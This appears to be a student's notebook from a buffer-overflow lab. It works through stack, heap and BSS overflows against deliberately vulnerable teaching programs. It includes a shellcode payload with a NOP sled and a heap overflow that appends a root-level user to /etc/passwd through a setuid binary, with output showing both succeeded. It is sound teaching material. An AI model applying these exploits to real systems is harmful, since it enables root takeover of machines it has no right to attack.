# Buffer Overflows
- most Internet worms use buffer overflow vulnerabilities to propagate
- C and C++ assume that programmers are responsible for data integrity
- modern compilers and OSes provide various protections making it harder to exploit traditional buffer overflows
- once the buffer is allocated, there's no built-in mechanism to safeguard the amount of data that can be stored into to
    - this is called buffer overrun or buffer overflow
    - user data may overwrite other part of the memory it's not supposed to making the program behave differently or crashing the program
    - hackers could take advantage of this flaw to control the program and may pawn the system by executing shellcode or payload of their choice
- typically two types:
    1. stack overflow
    2. heap overflow

## Stack Overflow
- overrun in stack segment

### some demo programs that demonstrate stackoverflow

### overwrite variable values with the data of your choice
1. booksrc/overflow_example.c
- compile and run the program with some arguments
    - `./overflow_example $(perl -e 'print "A"x15')`
    - `./overflow_example $(perl -e 'print "A"x16')`
- try to overwrite value of int value variable with "BCDE"
- find the difference between the address of value and buffer_two
    - perl -e 'print hex(0xbffff1dc-0xbffff1cc)' -> 22 bytes? should be 16
    - `./overflow_example $(perl -e 'print "A"x16 . "BCDE"')`
    - `./overflow_example $(perl -e 'print "Ax16 . "\x45\x44\x43\x42")`

### change the flow of the program
#### authenticate without using actual password

2. booksrc/auth_overflow.c
- overrun the buffer to print "Access Granted" without providing actual password
    - `./compile.sh auth_overflow_c auth_overflow`
    - `./auth_overflow $(perl -e 'print "A"x20')`
    
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
    - ./gdb -q auth_overflow
    - break main
    - break check_authentication
    - run $(perl -e 'print "A"x20')
    - x/s password_buffer
    - x/x &auth_flag

### can you overflow if the variable declaration orders are switched? why or why not? verify it using GDB.

#### overwrite the return address to authenticate? doesn't work on newer system (tested on Kali (4-19-0)!
3. booksrc/authoverflow2.c
- see in gdb where auth_flag is compared to password_buffer
- turns out auth_flag is still at higher address (pushed before) compared to password_buffer
- address with As

## stackoverflow exploit demo
- ./compile.sh booksrc/stackoverflowdemo.c stackoverflowdemo
- ./python2 exploit_stackoverflow.py

### How was the exploit_stackoverflow.py generated?

### Use GDB-PEDA
- create pattern and use as an agrument to the program
    - gdb -q ./stackoverflowdemo
    - pattern arg 200
    - run 
    - after program crashes run
    - patts or pattern search
    - look for EIP.and note the EIP offset
        - ..found at offset [#] that's the total offset  where return address (to end of retrun address) is from the overflown buffer base address 
- generate skeleton exploit code using GDB-PEDA
    - skeleton argv exploit_stackoverflow.py
- create local linux shellcode 
    - shellcode generate x86/linux exec
- copy the shellcode in the python exploit code
- create payload: `[NOP sled | exploit | return address]`
- find return address somewhere in the middle of buffer using GDB

## Using bash to exploit stackoverflowdemo.exe
- create payload buffer with shellcode
    - 48 bytes nop sleds + shellcode (24 bytes) + return address (4 bytes)
- run program with the payload
    - `$ ./stackoverflowdemo.exe $(cat payloadFile)`

In [9]:
%%bash
payloadFile=./booksrc/stackoverflowpayload.bin
perl -e 'print "\x90"x48' > $payloadFile
cat ./booksrc/shellcodex86linuxexec >> $payloadFile
perl -e 'print "\x34\xf1\xff\xbf"' >> $payloadFile
# check the size of the file
echo "$payloadFile Size in bytes"
wc -c $payloadFile

./booksrc/stackoverflowpayload.bin Size in bytes
76 ./booksrc/stackoverflowpayload.bin


### notesearch has stackoverflow vulnerability
- booksrc/notesearch.c

- compile.sh notesearch.c notesearch.exe
- `./notesearch.exe $(perl -e 'print '"A"x60')`

### exploit_notesearch.c is a complete exploit program that exploits stackoverflow in notesearch
- ./compile.sh exploit_notesearch.c exploit_notesearch.exe
- ./exploit_notesearch.exe
- run the provided exploit_notesearch.sh script to determine the offset
    - change the range if you still do not get the shell

## Heap Overflow
- buffer overflow can happen in other segments such as **heap** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited
- not standarized as stack overflow but can be just as effective

### notetaker.c is susceptible to heap overflow
```strcpy(buffer, argv[1]); // problem!
```

In [ ]:
%%bash
./booksrc/compile.sh ./booksrc/notetaker.c ./booksrc/notetaker.exe

### notetaker.exe must be setuid root program 
- all users in the system can take their own notes by writing to /var/notes file

```
$ sudo chown root:root notetaker.exe
$ sudo chmod u+s notetaker.exe
```

In [6]:
%%bash
ls -al ./booksrc/notetaker.exe

-rwsr-xr-x 1 root root 19156 Apr 17 16:24 ./booksrc/notetaker.exe


In [7]:
%%bash
./booksrc/notetaker.exe "new notefor user"

[DEBUG] buffer   @ 0x804d160: 'new notefor user'
[DEBUG] datafile @ 0x804d1d0: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.


In [8]:
%%bash
./booksrc/notetaker.exe $(perl -e 'print "A"x112')

[DEBUG] buffer   @ 0x804d160: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] datafile @ 0x804d1d0: ''


[!!] Fatal Error in main() while opening file: No such file or directory


CalledProcessError: Command 'b'./booksrc/notetaker.exe $(perl -e \'print "A"x112\')\n'' returned non-zero exit status 255.

In [9]:
%%bash
./booksrc/notetaker.exe $(perl -e 'print "A"x112 . "testfile"')

double free or corruption (out)
bash: line 1: 10429 Aborted                 ./booksrc/notetaker.exe $(perl -e 'print "A"x112 . "testfile"')


CalledProcessError: Command 'b'./booksrc/notetaker.exe $(perl -e \'print "A"x112 . "testfile"\')\n'' returned non-zero exit status 134.

In [10]:
%%bash
ls -al testfile

-rw------- 1 root user 126 Apr 17 16:39 testfile


In [11]:
%%bash
cat testfile

cat: testfile: Permission denied


## Exploit the heap-overflow flaw in notetaker program
- several clever ways to exploit this type of capability
- append a user to the /etc/passwd file?
- make a backup copy of the file just incase...

In [12]:
%%bash
cp /etc/passwd /tmp/passwd.bkup

In [13]:
%%bash
cat /tmp/passwd.bkup

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd

## /etc/passwd file format

username:password:userid:groupid:User Info:home folder:default shell
- x : hashed password stored in /etc/shadow file
- the password field can contain hashed password
- Perl crypt() function uses same function used by system to hash password

In [14]:
%%bash
perl -e 'print crypt("password", "AA")'

AA6tQYSfGxd/A

In [15]:
%%bash
perl -e 'print crypt("password", "XX")'

XXq2wKiyI43A2

## goal: genarate a entry that looks like

`letmein:XXq2wKiyI43A2:0:0:me:/root:/bin/bash`

### problem:
- it's hard to generate the exact line ending with /bin/bash
    - the file name /etc/passwd will be automatically attached at the end

### workaround:
- make /etc/passwd a soft link pointing to /bin/bash

In [20]:
%%bash
mkdir /tmp/etc
ln -s /bin/bash /tmp/etc/passwd

In [21]:
%%bash
ls -l /tmp/etc/passwd

lrwxrwxrwx 1 user user 9 Apr 17 17:02 /tmp/etc/passwd -> /bin/bash


### now we've a valid password entry that looks like:

`letmein:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd`

#### one more thing:
- the value just before /etc/passwd must be 112 bytes long, remember?
- can play with user information column to adjust the length


In [22]:
%%bash
# find the length with empty user info
echo -ne letmein:XXq2wKiyI43A2:0:0::/root:/tmp | wc -c

37


In [23]:
%%bash
echo $((112-37))

75


In [26]:
%%bash
perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp"' | wc -c

112


In [27]:
%%bash
./booksrc/notetaker.exe $(perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"')

munmap_chunk(): invalid pointer
bash: line 1: 10676 Aborted                 ./booksrc/notetaker.exe $(perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"')


CalledProcessError: Command 'b'./booksrc/notetaker.exe $(perl -e \'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"\')\n'' returned non-zero exit status 134.

In [29]:
%%bash
tail /etc/passwd

Debian-snmp:x:113:115::/var/lib/snmp:/bin/false
geoclue:x:103:105::/var/lib/geoclue:/usr/sbin/nologin
user1:x:1002:1002:sdf sdaf,2133,232424,:/home/user1:/bin/bash
systemd-coredump:x:998:998:systemd Core Dumper:/:/sbin/nologin
tss:x:135:144:TPM2 software stack,,,:/var/lib/tpm:/bin/false
inetsim:x:136:999::/var/lib/inetsim:/usr/sbin/nologin
tom:x:1003:1003:Tom Cat,123,3132,23-2323:/home/tom:/bin/bash
jerry:x:1004:1004:Jerry Mouse,123,23,242:/home/jerry:/bin/bash
�  
letmein:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd


## now login or su letmein with password

## BSS Segment, Function Pointer Overflow
### Game of Chance program
- three different game functions
    - uses a single global function pointer to remember last game played
- uses global struct object in BSS segment to hold plyayer's info
- seteuid multi-user program that stores user's data in /var folder

- compile game_of_chance.c
- change ownership to root:root
- seteuid
- run and play game
- player.name buffer is 100 bytes
- input_name() copies data to player.name until \n
- play_the_game function can take advantage of the overflown function pointer when any game is 
- put the game to background - ctrl+z
- find the difference between player.name address and player.current_game (100)
- return to the suspended program: fg
- enter 5 to change name
- change name to 100As+BBBB+\n
- play the same game and see the DEBUG
- find valid address to overwrite current_game func ptr
- list symbols in object/binary (nm)
    - nm game_of_chance.exe
- automate/simulate the game play
- $ perl -e 'print "1\n10\nn\n5\n" . "A"x100 . "jackpot address in rev order" . "1\n" . "y\n"x10 . 
"n\n5\nJohn Doe\n7"' | ./game_of_chance